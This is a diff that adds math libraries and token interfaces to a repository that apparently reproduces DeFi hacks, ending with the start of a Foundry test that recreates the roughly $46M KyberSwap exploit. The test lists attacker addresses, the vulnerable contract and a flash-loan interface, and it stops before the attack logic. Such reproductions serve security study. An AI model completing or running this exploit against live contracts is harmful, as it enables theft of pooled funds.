+  /// also prevents out-of-range liquidity from being used to prevent adding in-range liquidity to a pool
+  /// @return The max amount of liquidity per tick
+  function maxTickLiquidity() external view returns (uint128);
+
+  /// @notice Look up information about a specific tick in the pool
+  /// @param tick The tick to look up
+  /// @return liquidityGross total liquidity amount from positions that uses this tick as a lower or upper tick
+  /// liquidityNet how much liquidity changes when the pool tick crosses above the tick
+  /// feeGrowthOutside the fee growth on the other side of the tick relative to the current tick
+  /// secondsPerLiquidityOutside the seconds per unit of liquidity  spent on the other side of the tick relative to the current tick
+  function ticks(int24 tick)
+    external
+    view
+    returns (
+      uint128 liquidityGross,
+      int128 liquidityNet,
+      uint256 feeGrowthOutside,
+      uint128 secondsPerLiquidityOutside
+    );
+
+  /// @notice Returns the previous and next initialized ticks of a specific tick
+  /// @dev If specified tick is uninitialized, the returned values are zero.
+  /// @param tick The tick to look up
+  function initializedTicks(int24 tick) external view returns (int24 previous, int24 next);
+
+  /// @notice Returns the information about a position by the position's key
+  /// @return liquidity the liquidity quantity of the position
+  /// @return feeGrowthInsideLast fee growth inside the tick range as of the last mint / burn action performed
+  function getPositions(
+    address owner,
+    int24 tickLower,
+    int24 tickUpper
+  ) external view returns (uint128 liquidity, uint256 feeGrowthInsideLast);
+
+  /// @notice Fetches the pool's prices, ticks and lock status
+  /// @return sqrtP sqrt of current price: sqrt(token1/token0)
+  /// @return currentTick pool's current tick
+  /// @return nearestCurrentTick pool's nearest initialized tick that is <= currentTick
+  /// @return locked true if pool is locked, false otherwise
+  function getPoolState()
+    external
+    view
+    returns (
+      uint160 sqrtP,
+      int24 currentTick,
+      int24 nearestCurrentTick,
+      bool locked
+    );
+
+  /// @notice Fetches the pool's liquidity values
+  /// @return baseL pool's base liquidity without reinvest liqudity
+  /// @return reinvestL the liquidity is reinvested into the pool
+  /// @return reinvestLLast last cached value of reinvestL, used for calculating reinvestment token qty
+  function getLiquidityState()
+    external
+    view
+    returns (
+      uint128 baseL,
+      uint128 reinvestL,
+      uint128 reinvestLLast
+    );
+
+  /// @return feeGrowthGlobal All-time fee growth per unit of liquidity of the pool
+  function getFeeGrowthGlobal() external view returns (uint256);
+
+  /// @return secondsPerLiquidityGlobal All-time seconds per unit of liquidity of the pool
+  /// @return lastUpdateTime The timestamp in which secondsPerLiquidityGlobal was last updated
+  function getSecondsPerLiquidityData()
+    external
+    view
+    returns (uint128 secondsPerLiquidityGlobal, uint32 lastUpdateTime);
+
+  /// @notice Calculates and returns the active time per unit of liquidity until current block.timestamp
+  /// @param tickLower The lower tick (of a position)
+  /// @param tickUpper The upper tick (of a position)
+  /// @return secondsPerLiquidityInside active time (multiplied by 2^96)
+  /// between the 2 ticks, per unit of liquidity.
+  function getSecondsPerLiquidityInside(int24 tickLower, int24 tickUpper)
+    external
+    view
+    returns (uint128 secondsPerLiquidityInside);
+}

--- a/src/test/KyberSwap/interfaces/token/ERC20/IERC20.sol
+++ b/src/test/KyberSwap/interfaces/token/ERC20/IERC20.sol
@@ -1,0 +1,79 @@
+// SPDX-License-Identifier: MIT
+// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)
+
+pragma solidity ^0.8.20;
+
+/**
+ * @dev Interface of the ERC-20 standard as defined in the ERC.
+ */
+interface IERC20 {
+    /**
+     * @dev Emitted when `value` tokens are moved from one account (`from`) to
+     * another (`to`).
+     *
+     * Note that `value` may be zero.
+     */
+    event Transfer(address indexed from, address indexed to, uint256 value);
+
+    /**
+     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
+     * a call to {approve}. `value` is the new allowance.
+     */
+    event Approval(address indexed owner, address indexed spender, uint256 value);
+
+    /**
+     * @dev Returns the value of tokens in existence.
+     */
+    function totalSupply() external view returns (uint256);
+
+    /**
+     * @dev Returns the value of tokens owned by `account`.
+     */
+    function balanceOf(address account) external view returns (uint256);
+
+    /**
+     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
+     *
+     * Returns a boolean value indicating whether the operation succeeded.
+     *
+     * Emits a {Transfer} event.
+     */
+    function transfer(address to, uint256 value) external returns (bool);
+
+    /**
+     * @dev Returns the remaining number of tokens that `spender` will be
+     * allowed to spend on behalf of `owner` through {transferFrom}. This is
+     * zero by default.
+     *
+     * This value changes when {approve} or {transferFrom} are called.
+     */
+    function allowance(address owner, address spender) external view returns (uint256);
+
+    /**
+     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
+     * caller's tokens.
+     *
+     * Returns a boolean value indicating whether the operation succeeded.
+     *
+     * IMPORTANT: Beware that changing an allowance with this method brings the risk
+     * that someone may use both the old and the new allowance by unfortunate
+     * transaction ordering. One possible solution to mitigate this race
+     * condition is to first reduce the spender's allowance to 0 and set the
+     * desired value afterwards:
+     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
+     *
+     * Emits an {Approval} event.
+     */
+    function approve(address spender, uint256 value) external returns (bool);
+
+    /**
+     * @dev Moves a `value` amount of tokens from `from` to `to` using the
+     * allowance mechanism. `value` is then deducted from the caller's
+     * allowance.
+     *
+     * Returns a boolean value indicating whether the operation succeeded.
+     *
+     * Emits a {Transfer} event.
+     */
+    function transferFrom(address from, address to, uint256 value) external returns (bool);
+}

--- a/src/test/KyberSwap/interfaces/token/ERC721/IERC721.sol
+++ b/src/test/KyberSwap/interfaces/token/ERC721/IERC721.sol
@@ -1,0 +1,135 @@
+// SPDX-License-Identifier: MIT
+// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC721/IERC721.sol)
+
+pragma solidity ^0.8.20;
+
+import {IERC165} from "../../utils/introspection/IERC165.sol";
+
+/**
+ * @dev Required interface of an ERC-721 compliant contract.
+ */
+interface IERC721 is IERC165 {
+    /**
+     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
+     */
+    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);
+
+    /**
+     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
+     */
+    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);
+
+    /**
+     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
+     */
+    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);
+
+    /**
+     * @dev Returns the number of tokens in ``owner``'s account.
+     */
+    function balanceOf(address owner) external view returns (uint256 balance);
+
+    /**
+     * @dev Returns the owner of the `tokenId` token.
+     *
+     * Requirements:
+     *
+     * - `tokenId` must exist.
+     */
+    function ownerOf(uint256 tokenId) external view returns (address owner);
+
+    /**
+     * @dev Safely transfers `tokenId` token from `from` to `to`.
+     *
+     * Requirements:
+     *
+     * - `from` cannot be the zero address.
+     * - `to` cannot be the zero address.
+     * - `tokenId` token must exist and be owned by `from`.
+     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
+     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon
+     *   a safe transfer.
+     *
+     * Emits a {Transfer} event.
+     */
+    function safeTransferFrom(address from, address to, uint256 tokenId, bytes calldata data) external;
+
+    /**
+     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
+     * are aware of the ERC-721 protocol to prevent tokens from being forever locked.
+     *
+     * Requirements:
+     *
+     * - `from` cannot be the zero address.
+     * - `to` cannot be the zero address.
+     * - `tokenId` token must exist and be owned by `from`.
+     * - If the caller is not `from`, it must have been allowed to move this token by either {approve} or
+     *   {setApprovalForAll}.
+     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon
+     *   a safe transfer.
+     *
+     * Emits a {Transfer} event.
+     */
+    function safeTransferFrom(address from, address to, uint256 tokenId) external;
+
+    /**
+     * @dev Transfers `tokenId` token from `from` to `to`.
+     *
+     * WARNING: Note that the caller is responsible to confirm that the recipient is capable of receiving ERC-721
+     * or else they may be permanently lost. Usage of {safeTransferFrom} prevents loss, though the caller must
+     * understand this adds an external call which potentially creates a reentrancy vulnerability.
+     *
+     * Requirements:
+     *
+     * - `from` cannot be the zero address.
+     * - `to` cannot be the zero address.
+     * - `tokenId` token must be owned by `from`.
+     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
+     *
+     * Emits a {Transfer} event.
+     */
+    function transferFrom(address from, address to, uint256 tokenId) external;
+
+    /**
+     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
+     * The approval is cleared when the token is transferred.
+     *
+     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
+     *
+     * Requirements:
+     *
+     * - The caller must own the token or be an approved operator.
+     * - `tokenId` must exist.
+     *
+     * Emits an {Approval} event.
+     */
+    function approve(address to, uint256 tokenId) external;
+
+    /**
+     * @dev Approve or remove `operator` as an operator for the caller.
+     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
+     *
+     * Requirements:
+     *
+     * - The `operator` cannot be the address zero.
+     *
+     * Emits an {ApprovalForAll} event.
+     */
+    function setApprovalForAll(address operator, bool approved) external;
+
+    /**
+     * @dev Returns the account approved for `tokenId` token.
+     *
+     * Requirements:
+     *
+     * - `tokenId` must exist.
+     */
+    function getApproved(uint256 tokenId) external view returns (address operator);
+
+    /**
+     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
+     *
+     * See {setApprovalForAll}
+     */
+    function isApprovedForAll(address owner, address operator) external view returns (bool);
+}

--- a/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Enumerable.sol
+++ b/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Enumerable.sol
@@ -1,0 +1,29 @@
+// SPDX-License-Identifier: MIT
+// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC721/extensions/IERC721Enumerable.sol)
+
+pragma solidity ^0.8.20;
+
+import {IERC721} from "../IERC721.sol";
+
+/**
+ * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
+ * @dev See https://eips.ethereum.org/EIPS/eip-721
+ */
+interface IERC721Enumerable is IERC721 {
+    /**
+     * @dev Returns the total amount of tokens stored by the contract.
+     */
+    function totalSupply() external view returns (uint256);
+
+    /**
+     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
+     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
+     */
+    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);
+
+    /**
+     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
+     * Use along with {totalSupply} to enumerate all tokens.
+     */
+    function tokenByIndex(uint256 index) external view returns (uint256);
+}

--- a/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Metadata.sol
+++ b/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Metadata.sol
@@ -1,0 +1,27 @@
+// SPDX-License-Identifier: MIT
+// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC721/extensions/IERC721Metadata.sol)
+
+pragma solidity ^0.8.20;
+
+import {IERC721} from "../IERC721.sol";
+
+/**
+ * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
+ * @dev See https://eips.ethereum.org/EIPS/eip-721
+ */
+interface IERC721Metadata is IERC721 {
+    /**
+     * @dev Returns the token collection name.
+     */
+    function name() external view returns (string memory);
+
+    /**
+     * @dev Returns the token collection symbol.
+     */
+    function symbol() external view returns (string memory);
+
+    /**
+     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
+     */
+    function tokenURI(uint256 tokenId) external view returns (string memory);
+}

--- a/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Permit.sol
+++ b/src/test/KyberSwap/interfaces/token/ERC721/extensions/IERC721Permit.sol
@@ -1,0 +1,43 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity >=0.8.0;
+
+import {IERC721} from '../IERC721.sol';
+import {IERC721Enumerable} from './IERC721Enumerable.sol';
+
+/// @title ERC721 with permit
+/// @notice Extension to ERC721 that includes a permit function for signature based approvals
+interface IERC721Permit is IERC721, IERC721Enumerable {
+  /// @notice The permit typehash used in the permit signature
+  /// @return The typehash for the permit
+  function PERMIT_TYPEHASH() external pure returns (bytes32);
+
+  /// @notice The domain separator used in the permit signature
+  /// @return The domain seperator used in encoding of permit signature
+  function DOMAIN_SEPARATOR() external view returns (bytes32);
+
+  /// @notice Approve of a specific token ID for spending by spender via signature
+  /// @param spender The account that is being approved
+  /// @param tokenId The ID of the token that is being approved for spending
+  /// @param deadline The deadline timestamp by which the call must be mined for the approve to work
+  /// @param v Must produce valid secp256k1 signature from the holder along with `r` and `s`
+  /// @param r Must produce valid secp256k1 signature from the holder along with `v` and `s`
+  /// @param s Must produce valid secp256k1 signature from the holder along with `r` and `v`
+  function permit(
+    address spender,
+    uint256 tokenId,
+    uint256 deadline,
+    uint8 v,
+    bytes32 r,
+    bytes32 s
+  ) external;
+
+  /**
+   * @dev Returns true if this contract implements the interface defined by
+   * `interfaceId`. See the corresponding
+   * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
+   * to learn more about how these ids are created.
+   *
+   * This function call must use less than 30 000 gas.
+   */
+  function supportsInterface(bytes4 interfaceId) external view returns (bool);
+}

--- a/src/test/KyberSwap/interfaces/utils/introspection/IERC165.sol
+++ b/src/test/KyberSwap/interfaces/utils/introspection/IERC165.sol
@@ -1,0 +1,25 @@
+// SPDX-License-Identifier: MIT
+// OpenZeppelin Contracts (last updated v5.0.0) (utils/introspection/IERC165.sol)
+
+pragma solidity ^0.8.20;
+
+/**
+ * @dev Interface of the ERC-165 standard, as defined in the
+ * https://eips.ethereum.org/EIPS/eip-165[ERC].
+ *
+ * Implementers can declare support of contract interfaces, which can then be
+ * queried by others ({ERC165Checker}).
+ *
+ * For an implementation, see {ERC165}.
+ */
+interface IERC165 {
+    /**
+     * @dev Returns true if this contract implements the interface defined by
+     * `interfaceId`. See the corresponding
+     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[ERC section]
+     * to learn more about how these ids are created.
+     *
+     * This function call must use less than 30 000 gas.
+     */
+    function supportsInterface(bytes4 interfaceId) external view returns (bool);
+}

--- a/src/test/KyberSwap/libraries/QtyDeltaMath.sol
+++ b/src/test/KyberSwap/libraries/QtyDeltaMath.sol
@@ -1,0 +1,112 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+import {MathConstants as C} from './MathConstants.sol';
+import {TickMath} from './TickMath.sol';
+import {FullMath} from './FullMath.sol';
+import {SafeCast} from './SafeCast.sol';
+
+/// @title Contains helper functions for calculating
+/// token0 and token1 quantites from differences in prices
+/// or from burning reinvestment tokens
+library QtyDeltaMath {
+  using SafeCast for uint256;
+  using SafeCast for int128;
+
+  function calcUnlockQtys(uint160 initialSqrtP)
+    internal
+    pure
+    returns (uint256 qty0, uint256 qty1)
+  {
+    qty0 = FullMath.mulDivCeiling(C.MIN_LIQUIDITY, C.TWO_POW_96, initialSqrtP);
+    qty1 = FullMath.mulDivCeiling(C.MIN_LIQUIDITY, initialSqrtP, C.TWO_POW_96);
+  }
+
+  /// @notice Gets the qty0 delta between two prices
+  /// @dev Calculates liquidity / sqrt(lower) - liquidity / sqrt(upper),
+  /// i.e. liquidity * (sqrt(upper) - sqrt(lower)) / (sqrt(upper) * sqrt(lower))
+  /// rounds up if adding liquidity, rounds down if removing liquidity
+  /// @param lowerSqrtP The lower sqrt price.
+  /// @param upperSqrtP The upper sqrt price. Should be >= lowerSqrtP
+  /// @param liquidity Liquidity quantity
+  /// @param isAddLiquidity true = add liquidity, false = remove liquidity
+  /// @return token0 qty required for position with liquidity between the 2 sqrt prices
+  function calcRequiredQty0(
+    uint160 lowerSqrtP,
+    uint160 upperSqrtP,
+    uint128 liquidity,
+    bool isAddLiquidity
+  ) internal pure returns (int256) {
+    uint256 numerator1 = uint256(liquidity) << C.RES_96;
+    uint256 numerator2;
+    unchecked {
+      numerator2 = upperSqrtP - lowerSqrtP;
+    }
+    return
+      isAddLiquidity
+        ? (divCeiling(FullMath.mulDivCeiling(numerator1, numerator2, upperSqrtP), lowerSqrtP))
+          .toInt256()
+        : (FullMath.mulDivFloor(numerator1, numerator2, upperSqrtP) / lowerSqrtP).revToInt256();
+  }
+
+  /// @notice Gets the token1 delta quantity between two prices
+  /// @dev Calculates liquidity * (sqrt(upper) - sqrt(lower))
+  /// rounds up if adding liquidity, rounds down if removing liquidity
+  /// @param lowerSqrtP The lower sqrt price.
+  /// @param upperSqrtP The upper sqrt price. Should be >= lowerSqrtP
+  /// @param liquidity Liquidity quantity
+  /// @param isAddLiquidity true = add liquidity, false = remove liquidity
+  /// @return token1 qty required for position with liquidity between the 2 sqrt prices
+  function calcRequiredQty1(
+    uint160 lowerSqrtP,
+    uint160 upperSqrtP,
+    uint128 liquidity,
+    bool isAddLiquidity
+  ) internal pure returns (int256) {
+    unchecked {
+      return
+        isAddLiquidity
+          ? (FullMath.mulDivCeiling(liquidity, upperSqrtP - lowerSqrtP, C.TWO_POW_96)).toInt256()
+          : (FullMath.mulDivFloor(liquidity, upperSqrtP - lowerSqrtP, C.TWO_POW_96)).revToInt256();
+    }
+  }
+
+  /// @notice Calculates the token0 quantity proportion to be sent to the user
+  /// for burning reinvestment tokens
+  /// @param sqrtP Current pool sqrt price
+  /// @param liquidity Difference in reinvestment liquidity due to reinvestment token burn
+  /// @return token0 quantity to be sent to the user
+  function getQty0FromBurnRTokens(uint160 sqrtP, uint256 liquidity)
+    internal
+    pure
+    returns (uint256)
+  {
+    return FullMath.mulDivFloor(liquidity, C.TWO_POW_96, sqrtP);
+  }
+
+  /// @notice Calculates the token1 quantity proportion to be sent to the user
+  /// for burning reinvestment tokens
+  /// @param sqrtP Current pool sqrt price
+  /// @param liquidity Difference in reinvestment liquidity due to reinvestment token burn
+  /// @return token1 quantity to be sent to the user
+  function getQty1FromBurnRTokens(uint160 sqrtP, uint256 liquidity)
+    internal
+    pure
+    returns (uint256)
+  {
+    return FullMath.mulDivFloor(liquidity, sqrtP, C.TWO_POW_96);
+  }
+
+  /// @notice Returns ceil(x / y)
+  /// @dev division by 0 has unspecified behavior, and must be checked externally
+  /// @param x The dividend
+  /// @param y The divisor
+  /// @return z The quotient, ceil(x / y)
+  function divCeiling(uint256 x, uint256 y) internal pure returns (uint256 z) {
+    // return x / y + ((x % y == 0) ? 0 : 1);
+    require(y > 0);
+    assembly {
+      z := add(div(x, y), gt(mod(x, y), 0))
+    }
+  }
+}

--- a/src/test/KyberSwap/libraries/TickMath.sol
+++ b/src/test/KyberSwap/libraries/TickMath.sol
@@ -1,0 +1,219 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity >=0.8.0;
+
+/// @title Math library for computing sqrt prices from ticks and vice versa
+/// @notice Computes sqrt price for ticks of size 1.0001, i.e. sqrt(1.0001^tick) as fixed point Q64.96 numbers. Supports
+/// prices between 2**-128 and 2**128
+library TickMath {
+  /// @dev The minimum tick that may be passed to #getSqrtRatioAtTick computed from log base 1.0001 of 2**-128
+  int24 internal constant MIN_TICK = -887272;
+  /// @dev The maximum tick that may be passed to #getSqrtRatioAtTick computed from log base 1.0001 of 2**128
+  int24 internal constant MAX_TICK = -MIN_TICK;
+
+  /// @dev The minimum value that can be returned from #getSqrtRatioAtTick. Equivalent to getSqrtRatioAtTick(MIN_TICK)
+  uint160 internal constant MIN_SQRT_RATIO = 4295128739;
+  /// @dev The maximum value that can be returned from #getSqrtRatioAtTick. Equivalent to getSqrtRatioAtTick(MAX_TICK)
+  uint160 internal constant MAX_SQRT_RATIO = 1461446703485210103287273052203988822378723970342;
+
+  /// @notice Calculates sqrt(1.0001^tick) * 2^96
+  /// @dev Throws if |tick| > max tick
+  /// @param tick The input tick for the above formula
+  /// @return sqrtP A Fixed point Q64.96 number representing the sqrt of the ratio of the two assets (token1/token0)
+  /// at the given tick
+  function getSqrtRatioAtTick(int24 tick) internal pure returns (uint160 sqrtP) {
+    unchecked {
+      uint256 absTick = uint256(tick < 0 ? -int256(tick) : int256(tick));
+      require(absTick <= uint256(int256(MAX_TICK)), 'T');
+
+      // do bitwise comparison, if i-th bit is turned on,
+      // multiply ratio by hardcoded values of sqrt(1.0001^-(2^i)) * 2^128
+      // where 0 <= i <= 19
+      uint256 ratio = (absTick & 0x1 != 0)
+        ? 0xfffcb933bd6fad37aa2d162d1a594001
+        : 0x100000000000000000000000000000000;
+      if (absTick & 0x2 != 0) ratio = (ratio * 0xfff97272373d413259a46990580e213a) >> 128;
+      if (absTick & 0x4 != 0) ratio = (ratio * 0xfff2e50f5f656932ef12357cf3c7fdcc) >> 128;
+      if (absTick & 0x8 != 0) ratio = (ratio * 0xffe5caca7e10e4e61c3624eaa0941cd0) >> 128;
+      if (absTick & 0x10 != 0) ratio = (ratio * 0xffcb9843d60f6159c9db58835c926644) >> 128;
+      if (absTick & 0x20 != 0) ratio = (ratio * 0xff973b41fa98c081472e6896dfb254c0) >> 128;
+      if (absTick & 0x40 != 0) ratio = (ratio * 0xff2ea16466c96a3843ec78b326b52861) >> 128;
+      if (absTick & 0x80 != 0) ratio = (ratio * 0xfe5dee046a99a2a811c461f1969c3053) >> 128;
+      if (absTick & 0x100 != 0) ratio = (ratio * 0xfcbe86c7900a88aedcffc83b479aa3a4) >> 128;
+      if (absTick & 0x200 != 0) ratio = (ratio * 0xf987a7253ac413176f2b074cf7815e54) >> 128;
+      if (absTick & 0x400 != 0) ratio = (ratio * 0xf3392b0822b70005940c7a398e4b70f3) >> 128;
+      if (absTick & 0x800 != 0) ratio = (ratio * 0xe7159475a2c29b7443b29c7fa6e889d9) >> 128;
+      if (absTick & 0x1000 != 0) ratio = (ratio * 0xd097f3bdfd2022b8845ad8f792aa5825) >> 128;
+      if (absTick & 0x2000 != 0) ratio = (ratio * 0xa9f746462d870fdf8a65dc1f90e061e5) >> 128;
+      if (absTick & 0x4000 != 0) ratio = (ratio * 0x70d869a156d2a1b890bb3df62baf32f7) >> 128;
+      if (absTick & 0x8000 != 0) ratio = (ratio * 0x31be135f97d08fd981231505542fcfa6) >> 128;
+      if (absTick & 0x10000 != 0) ratio = (ratio * 0x9aa508b5b7a84e1c677de54f3e99bc9) >> 128;
+      if (absTick & 0x20000 != 0) ratio = (ratio * 0x5d6af8dedb81196699c329225ee604) >> 128;
+      if (absTick & 0x40000 != 0) ratio = (ratio * 0x2216e584f5fa1ea926041bedfe98) >> 128;
+      if (absTick & 0x80000 != 0) ratio = (ratio * 0x48a170391f7dc42444e8fa2) >> 128;
+
+      // take reciprocal for positive tick values
+      if (tick > 0) ratio = type(uint256).max / ratio;
+
+      // this divides by 1<<32 rounding up to go from a Q128.128 to a Q128.96.
+      // we then downcast because we know the result always fits within 160 bits due to our tick input constraint
+      // we round up in the division so getTickAtSqrtRatio of the output price is always consistent
+      sqrtP = uint160((ratio >> 32) + (ratio % (1 << 32) == 0 ? 0 : 1));
+    }
+  }
+
+  /// @notice Calculates the greatest tick value such that getRatioAtTick(tick) <= ratio
+  /// @dev Throws in case sqrtP < MIN_SQRT_RATIO, as MIN_SQRT_RATIO is the lowest value getRatioAtTick may
+  /// ever return.
+  /// @param sqrtP The sqrt ratio for which to compute the tick as a Q64.96
+  /// @return tick The greatest tick for which the ratio is less than or equal to the input ratio
+  function getTickAtSqrtRatio(uint160 sqrtP) internal pure returns (int24 tick) {
+    // second inequality must be < because the price can never reach the price at the max tick
+    require(sqrtP >= MIN_SQRT_RATIO && sqrtP < MAX_SQRT_RATIO, 'R');
+    uint256 ratio = uint256(sqrtP) << 32;
+
+    uint256 r = ratio;
+    uint256 msb = 0;
+
+    unchecked {
+      assembly {
+        let f := shl(7, gt(r, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(6, gt(r, 0xFFFFFFFFFFFFFFFF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(5, gt(r, 0xFFFFFFFF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(4, gt(r, 0xFFFF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(3, gt(r, 0xFF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(2, gt(r, 0xF))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := shl(1, gt(r, 0x3))
+        msb := or(msb, f)
+        r := shr(f, r)
+      }
+      assembly {
+        let f := gt(r, 0x1)
+        msb := or(msb, f)
+      }
+
+      if (msb >= 128) r = ratio >> (msb - 127);
+      else r = ratio << (127 - msb);
+
+      int256 log_2 = (int256(msb) - 128) << 64;
+
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(63, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(62, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(61, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(60, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(59, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(58, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(57, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(56, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(55, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(54, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(53, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(52, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(51, f))
+        r := shr(f, r)
+      }
+      assembly {
+        r := shr(127, mul(r, r))
+        let f := shr(128, r)
+        log_2 := or(log_2, shl(50, f))
+      }
+
+      int256 log_sqrt10001 = log_2 * 255738958999603826347141; // 128.128 number
+
+      int24 tickLow = int24((log_sqrt10001 - 3402992956809132418596140100660247210) >> 128);
+      int24 tickHi = int24((log_sqrt10001 + 291339464771989622907027621153398088495) >> 128);
+
+      tick = tickLow == tickHi ? tickLow : getSqrtRatioAtTick(tickHi) <= sqrtP ? tickHi : tickLow;
+    }
+  }
+
+  function getMaxNumberTicks(int24 _tickDistance) internal pure returns (uint24 numTicks) {
+    return uint24(TickMath.MAX_TICK / _tickDistance) * 2;
+  }
+}

--- a/src/test/KyberSwap_exp.eth.1.sol
+++ b/src/test/KyberSwap_exp.eth.1.sol
@@ -1,0 +1,105 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "./interface.sol";
+
+// @KeyInfo - Total Lost : ~$46M
+// Attacker EOA: https://etherscan.io/address/0x50275e0b7261559ce1644014d4b78d4aa63be836
+// Attacker Contracts : https://etherscan.io/address/0xaf2acf3d4ab78e4c702256d214a3189a874cdc13
+// Vulnerable Contract : https://etherscan.io/address/0xFd7B111AA83b9b6F547E617C7601EfD997F64703
+// Transaction : https://phalcon.blocksec.com/explorer/tx/eth/0x485e08dc2b6a4b3aeadcb89c3d18a37666dc7d9424961a2091d6b3696792f0f3 (block 18630392)
+
+// @Analysis
+// https://phalcon.blocksec.com/explorer/security-incidents
+// https://twitter.com/BlockSecTeam/status/1727560157888942331
+// https://blocksec.com/blog/yet-another-tragedy-of-precision-loss-an-in-depth-analysis-of-the-kyber-swap-incident-1
+// https://blog.solidityscan.com/kyberswap-hack-analysis-25e25f2e4a7b
+// https://slowmist.medium.com/a-deep-dive-into-the-kyberswap-hack-3e13f3305d3a
+
+interface IPoolStorage {
+    function token0() external view returns (IERC20);
+
+    function token1() external view returns (IERC20);
+
+    function swapFeeUnits() external view returns (uint24);
+
+    function tickDistance() external view returns (int24);
+
+    function getPositions(address owner, int24 tickLower, int24 tickUpper) external view returns (uint128 liquidity, uint256 feeGrowthInsideLast);
+
+    function getPoolState() external view returns (uint160 sqrtP, int24 currentTick, int24 nearestCurrentTick, bool locked);
+
+    function getLiquidityState() external view returns (uint128 baseL, uint128 reinvestL, uint128 reinvestLLast);
+}
+
+interface IPoolActions {
+    function swap(address recipient, int256 swapQty, bool isToken0, uint160 limitSqrtP, bytes memory data) external returns (int256 qty0, int256 qty1);
+}
+
+interface IPoolKyberswap is IPoolActions, IPoolStorage {}
+
+interface IPoolAave {
+    function flashLoanSimple(address receiverAddress, address asset, uint256 amount, bytes memory params, uint16 referralCode) external;
+}
+
+contract Logger is Test {
+    function logTag(string memory stage, string memory token, string memory label) public returns (string memory) {
+        string memory text_stage = string(abi.encodePacked(" [ ", stage, " ] "));
+        string memory text_token = string(abi.encodePacked(" [ ", token, " ] "));
+        string memory text_label = string(abi.encodePacked(" [ ", label, " ] "));
+        return string(abi.encodePacked(text_stage, text_token, text_label));
+    }
+
+    function logBalances(string memory stage_label, string memory token_label, string memory target_label, address target, address token) public {
